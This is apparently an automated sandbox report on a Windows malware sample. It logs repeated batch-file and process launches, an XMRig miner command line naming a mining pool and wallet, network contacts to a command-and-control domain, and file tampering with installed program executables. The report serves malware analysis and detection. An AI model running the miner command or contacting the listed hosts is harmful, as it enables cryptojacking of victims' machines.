C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7f9f23f7.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\612e0eb6.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4cc51d8a.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7a602464.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6bf76741.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\0f8a4a06.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\432604e9.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\24b56fa8.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\524f7682.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6bda3532.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\19753c0c.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\39012ec5.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\24983d99.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4e2b5467.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\3dc95347.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\5d554600.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\0af04cda.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6c7f3799.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\621e6a82.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\49ae094a.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\394c082a.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\10d34ed4.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\026b11b1.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\15f51c58.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3012 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\018c2b2c.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\631b15eb.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\54b358c8.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6e3e1778.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\1bd91e52.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7d680911.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\2b020feb.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\1c9a52c8.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4a3559a2.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7dd01485.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\27642b53.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\02f26209.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\748a24e6.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 264 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\121c53a2.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\03b4167f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\5b3b5d29.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4ad95c09.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6a654ec2.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\1e0009a5.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\378b4855.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\65264f2f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\0eb965fd.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\3c546cd7.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\23e40b9f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 792 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\13820a7f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7511753e.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\66a9381b.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\14443ef5.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7fdb4dc9.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\19660c79.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4d01475c.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\009c023f.bat" "

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\ProgramData\Microsoft\National\Nationa.exe

C:\ProgramData\Microsoft\National\Nationa.exe -o stratum+tcp://xmr.crypto-pool.fr:80 -u 48ihXYmNKMUCdz7C5e5KB47FWxf9W6ruEYbhXHZ8qVff71WJ8TAZWCdM1rLUBpVWBdEzTYJbNt4URDm9M6mdbrvoToBSJA9 -p x -k --max-cpu-usage=80

Network

Country Destination Domain Proto
US 8.8.8.8:53 ddos.dnsnb8.net udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 xmr.crypto-pool.fr udp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-18 18:51

Reported

2024-05-18 18:53

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k1[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k5[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k2[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k3[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k4[1].rar C:\Windows\TEMP\aEHvt.exe N/A

Drops file in Program Files directory

Both copies of aEHvt.exe open several dozen third-party executables (Java, Office, Adobe Reader, Chrome, Firefox, 7-Zip and Store apps) for modification. The sandbox logs the open, not the bytes written, but C:\Program Files\7-Zip\Uninstall.exe also turns up in the Files list with its own hashes, which suggests it was written to rather than merely opened. On an infected host treat every binary in this list as possibly tampered: check Authenticode signatures and reinstall rather than trusting the files in place.

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\bin\schemagen.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\policytool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\codecpacks.VP9.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javapackager.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\javaws.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoev.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\XboxIdp.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\dotnet\dotnet.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\schemagen.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\WindowsCamera.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
